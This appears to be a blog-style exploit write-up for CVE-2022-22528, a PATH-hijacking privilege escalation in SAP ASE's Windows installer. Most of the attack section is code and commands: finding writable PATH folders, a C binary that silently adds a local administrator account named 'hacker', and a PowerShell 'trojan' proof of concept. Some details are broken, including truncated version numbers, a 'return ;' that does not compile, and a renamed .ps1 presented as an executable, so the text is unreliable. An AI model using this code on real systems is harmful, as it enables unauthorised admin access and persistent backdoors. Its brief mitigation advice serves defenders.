CVE-2022-22528 - Privilege Escalation in SAP Adaptive Server Enterprise (ASE) 16. Installer via PATH Hijacking

---

Introduction

In early 2022, a serious vulnerability (CVE-2022-22528) was discovered affecting SAP Adaptive Server Enterprise (ASE) version 16.—one of the most popular enterprise database management systems. This flaw doesn't impact ASE’s everyday operations, but targets its Windows installer process, leaving systems open to local privilege escalation.

In this post, we’ll break down how this vulnerability happens, what risks it opens up, show you code snippets of the exploitation scenario, and point to the original references. By the end, you'll know why this problem matters and what you can do to defend your systems.

Affected Product: SAP Adaptive Server Enterprise (ASE) 16. (Installer on Windows)

- Issue: During installation on Windows, ASE modifies the system PATH environment variable insecurely. Under certain configurations, this lets regular (non-admin) users trick the system into running malicious programs as SYSTEM or Administrator.

This vulnerability does NOT impact ASE's server binaries or daily use. The problem only happens during or shortly after installation.

References

- SAP Security Note 3149805 - Privilege escalation vulnerability in SAP ASE
- NIST NVD Entry: CVE-2022-22528

How Does the Exploit Work?

Many Windows programs depend on the PATH environment variable to find needed .dlls and .exes. If the PATH includes a world-writable folder early on, Windows may *accidentally* run malicious files placed there instead of the trusted binaries by an attacker.

When ASE 16. is installed, the installer adds its installation folder to the system PATH, sometimes using insecure folder permissions (like C:\SAP\ASE\bin). If this folder is writable by anyone (including low-privileged users), the door is open:

1. Standard User drops a fake executable (like notepad.exe, cmd.exe, or even a popular DLL filename) into C:\SAP\ASE\bin.
2. If any Admin or SYSTEM-level process launches a program or DLL searching the PATH, Windows grabs the attacker’s fake binary, not the real one—running it with powerful privileges.

Open Command Prompt and run

echo %PATH%

Find any folder (like C:\SAP\ASE\bin) that you can write into.

Check permissions

icacls "C:\SAP\ASE\bin"

If you see entries like Everyone:(OI)(CI)(F) or Users:(OI)(CI)(M), BINGO—the folder is writable.

2. Drop a Malicious Executable

Suppose an admin runs something that checks the PATH for ping.exe. We'll make our own evil ping.exe:

// evilping.c: Runs a payload (adds user 'hacker' with admin rights)
#include <stdlib.h>

int main() {
    system("net user hacker Passwrd! /add");
    system("net localgroup administrators hacker /add");
    return ;
}

Build it (with MinGW or Visual Studio)

gcc evilping.c -o ping.exe

Copy it to the vulnerable folder

copy ping.exe C:\SAP\ASE\bin\

3. Wait for the Right Process

Whenever ANY admin-level process calls ping (or any other poisoned command), Windows will run YOUR binary from C:\SAP\ASE\bin, not the real C:\Windows\System32\ping.exe.

4. Privilege Escalation Obtained

Now, you have a new admin account named 'hacker', created silently by your injected binary.

Proof of Concept (PoC) — Quick Demo

Here's a PowerShell PoC you can adapt. Suppose a non-admin user can write to the ASE bin folder.

# PoC: Drop a trojan notepad.exe in vulnerable PATH folder
$payload = @"
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show('You just ran my trojan as admin!')
"@
Set-Content -Path ".\notepad.ps1" -Value $payload
powershell.exe -ExecutionPolicy Bypass -File .\notepad.ps1

Rename payload to notepad.exe and drop in C:\SAP\ASE\bin. Next time admin does notepad, they get compromised.

Am I Affected?

- You’re at risk if your Windows machine has SAP ASE 16. installed AND its installer left a writable folder in the PATH.

Mitigations & Fix

- SAP’s Fix: Apply the patch or updated installer from SAP Note 3149805
- Short-term: Remove world-write permissions on the installation folder, or remove it from PATH if not strictly necessary.

Final Notes

This kind of “PATH hijacking” is a classic privilege escalation trick on Windows, but it’s often overlooked during quick installs. While CVE-2022-22528 only affects the installation process of SAP ASE on Windows, it’s a good reminder: Always check your environment variables and folder permissions.

For admins: Be sure your install routines don’t unintentionally open up security holes—and patch vulnerable applications as soon as possible.

More Resources

- SAP Security Patch Day Blog
- NIST NVD Entry: CVE-2022-22528
- SAP Note 3149805 (Official)

Stay safe, and always check your PATH.

*© 2024 – For educational purposes and responsible disclosure only.*

Timeline

Published on: 02/09/2022 23:15:00 UTC
Last modified on: 08/24/2022 16:15:00 UTC